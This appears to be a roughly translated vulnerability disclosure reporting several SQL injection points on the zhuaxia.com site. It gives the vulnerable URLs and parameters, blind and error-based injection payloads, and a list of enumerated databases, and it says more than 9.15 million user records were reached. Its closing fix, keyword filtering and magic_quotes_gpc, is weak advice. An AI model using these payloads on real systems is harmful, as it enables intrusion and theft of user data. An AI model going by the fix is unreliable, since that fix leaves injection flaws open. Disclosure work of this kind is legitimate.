Multiple SQL injections on the master site

Multiple SQL injections on the master site

Multiple SQL injections on the master site

First: URL: http://www.zhuaxia.com/php_controller/myFeedController.php? Action = channelInfo & chid = 833 & customerId = 29034823 & lastid = 0 & show_all_item = 1 & sourceid = 0 & stamp = 0.09998915647156537 & version = 200812241245 problematic parameter: chidpayload: 1. boolean blind note AND 1 = 1, AND 1 = 22. time-blind injection AND sleep (XX) Here is the second injection of the injection type: URL: http://www.zhuaxia.com/register_check.php? LogId = 165POST parameter: blog_url = 1 & code = 94102 & do_reg = 1 & email = test % 40email.com & ivc = ARkGQlYUBxw % 3d & nickname = 1 & password = g00dPa % 24% 24w0rD & password_second = g00dPa % the parameter for 24w0rD is email error injection payload: 'and select XXX from (select concat (xx) from ionfromation. XX) and 'A' = 'a here we should first disable the explicit error. Available databases [10]: [*] dba [*] information_schema [*] mysql [*] percona [*] cece_schema [*] test [*] tudui [*] wordpress [*] wordpress_mu [*] XiaoNei here, tudui is an important database that contains a large number of tables and then runs the first five data items, such:

This is a table of user information. Only the field screenshot graph is used as an example, and the data is not displayed later. Then I read the XiaoNei library.

We can see that there are more than 9.15 million user information, as shown in the first five data examples.

Solution:

Filter special characters such as spaces, commas, Parentheses, and other symbols unrelated to the business, and filter keywords and functions such as and or | & user () @ user, etc. If the keyword type is set to php, enable magic_quotes_gpc and then filter keywords and functions.